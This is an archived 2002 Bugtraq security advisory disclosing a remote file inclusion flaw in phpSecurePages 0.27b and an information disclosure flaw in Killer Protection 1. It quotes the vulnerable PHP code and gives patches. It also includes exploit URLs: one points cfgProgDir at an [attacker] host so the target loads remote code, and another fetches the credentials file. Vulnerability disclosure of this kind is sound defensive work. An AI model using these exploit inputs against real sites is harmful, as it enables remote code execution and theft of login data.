[27322] in bugtraq
phpSecurePages & Killer Protection ( PHP )
daemon@ATHENA.MIT.EDU (Frog Man)
Mon Oct 7 13:59:55 2002
From: "Frog Man" <leseulfrog@hotmail.com>
To: bugtraq@securityfocus.com
Date: Sun, 06 Oct 2002 21:47:02 +0200
Mime-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1; format=flowed
Message-ID: <F8415BopaZknqWuspGw00016117@hotmail.com>
1)
Informations :
°°°°°°°°°°°°°°
Product : phpSecurePages
Tested version : 0.27b
Website : http://www.phpsecurepages.f2s.com
Problem : include file
PHP Code :
°°°°°°°°°°
-------------- checklogin.php ---------------------
if (!$login) {
// no login available
include($cfgProgDir . "interface.php");
exit;
}
if (!$password) {
// no password available
$message = $strNoPassword;
include($cfgProgDir . "interface.php");
exit;
}
-------------- checklogin.php ------------------
Exploit :
°°°°°°°°°
http://[target]/checklogin.php?cfgProgDir=http://[attacker]/
or
http://[target]/checklogin.php?cfgProgDir=http://[attacker]/&login=1
with
http://[attacker]/interface.php .
Patch :
°°°°°°°
Add this :
$cfgProgDir = './';
at the begin of checklogin.php .
More details in french :
http://www.frog-man.org/tutos/phpSecurePages.txt
translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FphpSecurePages.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools
2)
Informations :
°°°°°°°°°°°°°°
Product : Killer Protection
Tested version : 1
Website : http://php3scripts.cjb.net
Problem : Informations disclosure
Exploit :
°°°°°°°°°
http://[target]/vars.inc
and
http://[target]/protection.php?mode=display&username=[LOGIN]&password=[PASSWORD]
Patch :
°°°°°°°
rename vars.inc >> vars.inc.php .
In protection.php, replace
require("vars2.inc");
bye
require("vars2.inc.php");
More details in french :
http://www.frog-man.org/tutos/KillerProtection.txt
translated by Google :
http://translate.google.com/translate?u=http://www.frog-man.org/tutos/KillerProtection.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools
frog-m@n
_________________________________________________________________
Affichez, modifiez et partagez gratuitement vos photos en ligne:
http://photos.msn.com/support/worldwide.aspx
